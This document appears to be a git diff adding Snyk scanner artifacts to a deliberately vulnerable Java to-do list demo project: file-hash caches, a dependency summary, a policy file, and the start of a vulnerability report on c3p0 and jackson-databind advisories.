olist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/TodoRepositoryImpl.java":[3171,1707749068018.3552,"80a2b851d940654643a460c2caae7ae6c2388353e7f9f50ae7c00df84cff1b57"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/UserRepositoryImpl.java":[3163,1707749068018.4534,"78b6b47b4356741a6f46104bade197655e9dd6064821d8bce20fd555f97880b5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/TodoService.java":[2585,1707749068018.6626,"2633068fbc59901a47a3a3bc9ae24be71a1f89f5bcbab9b88a69fdce4aa77b14"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/UserService.java":[2298,1707749068018.7725,"3dca704e01dcd28b8745421c21b4dc83f89020f5a0806f166bfee124f476a1b8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/TodoServiceImpl.java":[2798,1707749068018.8906,"ff7c4f6a14b51f6918b875849eba94d08cd041ea4262a5ba232f4c4724e3a117"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/UserServiceImpl.java":[2591,1707749068018.9702,"d44ca42fecf28dfe4c6a0ecc2a0bfacde4c97fffde20fe876a8fd1fce6184c97"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/AboutAction.java":[1593,1707749068023.9092,"aac0c815b65e7aa372635e13a1874b97404796162fdab3c8a2db8ccc665bfb77"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/BaseAction.java":[2755,1707749068024.01,"818c334580003a9059f8b9e343eee5527397c1cd54408a278c1e42c1c498af03"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/IndexAction.java":[1474,1707749068024.1094,"2b1fe3a7d1afc307195a1803b64955b233d41e26a0d5b38b8029c794ed5f0463"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/interceptor/LoginInterceptor.java":[2204,1707749068025.1648,"b4ae8f17a0cc66a14234de9f635874e100546098e5e67b7999beade579019b15"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/SearchTodoAction.java":[2347,1707749068024.2808,"23c393191001a8548c66a6112786261fd8821fea6ecbcbaded85ffc695c65499"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/TodoAction.java":[4174,1707749068024.5068,"f779cf49f727c3a070c3e17ecb29d4d1c8cc9844158393e7baad575f86c9f311"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java":[11846,1707749068024.6938,"70d6b7ad7b556b98b17dd858b269daed067f4d0f4b6f2d7079c599e469d86168"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/FilesAction.java":[2536,1707749068024.7944,"e47d909ef3e3a224f723c2dbdd6b35ee131064090570cdcf3ec0a514efa8767d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/HomeAction.java":[2513,1707749068024.883,"142a48bf4f5665546d1168347897fac76cae74d361f9f6a9476c6b90d8c3dc12"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/SessionAction.java":[3351,1707749068024.9883,"25a2fbf3e1485401fe11418e42e76149b0f2ec38a1a6dc3dde038be9e0be28d9"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/ChangePasswordForm.java":[2569,1707749068021.3772,"f1b0c8025daf900938caf746a85fe7df9cfeef0b85e7525eecc345daddacec83"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/LoginForm.java":[2097,1707749068021.4858,"303ba1f62ae2a9251c7fd1e1132bc91c6dbeacb760f0f8bad4d8f802b48bf4c7"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/RegistrationForm.java":[2783,1707749068021.578,"65958478e6c6df53811e97bd5a0e54489272be2e06bfb3a14641922c11e1dc1c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/HighlightTag.java":[3515,1707749068021.8755,"67df60f194c628b276134716f0d43d102d18a4ffdc5bcbd4afe834ad50f8af28"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/PriorityIconTag.java":[2167,1707749068022.0413,"b24e9381e1690b8c0ca9535c6fd50d472311f00bd520b4ceadd98d2b5ce80d85"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusLabelTag.java":[2085,1707749068022.2034,"af0925afa455c491d83245a16a39c98ac8fec45b4b035070a15d60ef47cfe074"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusStyleTag.java":[2105,1707749068022.3518,"82c42e37d2c6c02fc69297379a8183dd8bc8bbd80d29fca2a0868e7a532a1f95"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/util/TodoListUtils.java":[4018,1707749068022.542,"a743f24c83b6992948cb46bf8b2bd4d4b1c11dfd41a81c66c584d80d3b77e0a4"]} \ No newline at end of file diff --git a/todolist-goof/output.json b/todolist-goof/output.json new file mode 100644 index 0000000000..fbf0ee8434 --- /dev/null +++ b/todolist-goof/output.json @@ -0,0 +1,47 @@ +{ + "name": "io.github.snyk:todolist-mvc", + "version": "0.0.1-SNAPSHOT", + "dependencies": { + "javax.xml.bind:jaxb-api": { + "name": "javax.xml.bind:jaxb-api", + "version": "2.3.0" + }, + "com.sun.xml.bind:jaxb-core": { + "name": "com.sun.xml.bind:jaxb-core", + "version": "2.3.0" + }, + "com.sun.xml.bind:jaxb-impl": { + "name": "com.sun.xml.bind:jaxb-impl", + "version": "2.3.0" + } + }, + "type": "maven", + "packageFormatVersion": "mvn:0.0.1" +} +{ + "vulnerabilities": [], + "ok": true, + "dependencyCount": 3, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": {} + }, + "packageManager": "maven", + "projectId": "8fdce6f6-814a-4eef-8578-c7f918af3dd7", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": false, + "disregardFilesystemIgnores": false + }, + "summary": "No known vulnerabilities", + "filesystemPolicy": false, + "uniqueCount": 0, + "projectName": "io.github.snyk:todolist-mvc", + "foundProjectCount": 3, + "displayTargetFile": "pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof/todolist-goof" +} diff --git a/todolist-goof/todolist-core/.dccache b/todolist-goof/todolist-core/.dccache new file mode 100644 index 0000000000..5eeeb16434 --- /dev/null +++ b/todolist-goof/todolist-core/.dccache @@ -0,0 +1 @@ +{"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/pom.xml":[3597,1707749068017.0205,"09fed335bb1308ee3b405e6eb7cee510fc64e96527c59e933912d047ee60dc0d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/persistence.xml":[766,1707749068019.1663,"5fd1eca212d0b30f490d98338bf56550394060c0c4342a1bcf6ad6643b787428"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/application-context.xml":[868,1707749068019.3025,"b60c87281e4808b5d0f12a314c51d7cd44dd0a057a2378f925deb2e7b13f3d5e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/infrastructure-context.xml":[2335,1707749068019.3816,"c9a996e921025ae765b092e5739a03af219548a902852670444144d09d58f194"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/TodoServiceTest.java":[2061,1707749068020.2898,"97a4d9a387a2b063bed68c376282b7844fd77e1a1ab6bfa9f566fb6c66815ab3"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/UserServiceTest.java":[1911,1707749068020.393,"f08674cb5b00b45c4f2c0f5478b62a8d6da2e610ebf928d95d0f162ccf6b25f1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/Statics.java":[302,1707749068017.4575,"faf8ae30c8c00074f924d68192efea8ddf173d772e3857987eebc8474af8a025"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Priority.java":[1400,1707749068017.6262,"fbcf56cefa0166697104dc80f3cd9454e0a9ed64f32bf1f51b8ff52c61ade443"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Todo.java":[5142,1707749068017.7947,"e511ab0dcf0d6d60e2a08912558a03d2f3c2b4246cb374fc899c7375707a8ba6"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/User.java":[2744,1707749068017.8948,"82a4b1757798282d230b769625371b91f2a8892ad313f088159147548a511ce1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/TodoRepository.java":[2606,1707749068018.112,"a4b3b4808634f298057a0a480b55a279d4387af97bf285ecaf674dfea43184e1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/UserRepository.java":[2317,1707749068018.204,"dd3a1c73160008585fac38906516ee38a4c1ef58b1d8dca35b3c62a160318178"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/TodoRepositoryImpl.java":[3171,1707749068018.3552,"80a2b851d940654643a460c2caae7ae6c2388353e7f9f50ae7c00df84cff1b57"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/UserRepositoryImpl.java":[3163,1707749068018.4534,"78b6b47b4356741a6f46104bade197655e9dd6064821d8bce20fd555f97880b5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/TodoService.java":[2585,1707749068018.6626,"2633068fbc59901a47a3a3bc9ae24be71a1f89f5bcbab9b88a69fdce4aa77b14"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/UserService.java":[2298,1707749068018.7725,"3dca704e01dcd28b8745421c21b4dc83f89020f5a0806f166bfee124f476a1b8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/TodoServiceImpl.java":[2798,1707749068018.8906,"ff7c4f6a14b51f6918b875849eba94d08cd041ea4262a5ba232f4c4724e3a117"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/UserServiceImpl.java":[2591,1707749068018.9702,"d44ca42fecf28dfe4c6a0ecc2a0bfacde4c97fffde20fe876a8fd1fce6184c97"]} \ No newline at end of file diff --git a/todolist-goof/todolist-web-struts/.snyk b/todolist-goof/todolist-web-struts/.snyk new file mode 100644 index 0000000000..34ab14c18b --- /dev/null +++ b/todolist-goof/todolist-web-struts/.snyk @@ -0,0 +1,7 @@ +# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities. +version: v1.25.0 +ignore: + SNYK-WOLFILATEST-DOCKER-7569130: + - '*': + reason: None given + expires: '2020-06-19T20:36:54.553Z' diff --git a/todolist-goof/todolist-web-struts/json.json b/todolist-goof/todolist-web-struts/json.json new file mode 100644 index 0000000000..c6b8b24de7 --- /dev/null +++ b/todolist-goof/todolist-web-struts/json.json @@ -0,0 +1,37955 @@ +{ + "vulnerabilities": [ + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "high", + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2798", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.263794Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", + "epssDetails": { + "percentile": "0.77013", + "probability": "0.00519", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24750" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-09-18T13:46:28.613692Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-18T13:44:12Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-09-18T16:19:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.721313Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Srikanth Ramu", + "threedr3am'follower" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2658", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:44.942188Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", + "epssDetails": { + "percentile": "0.75677", 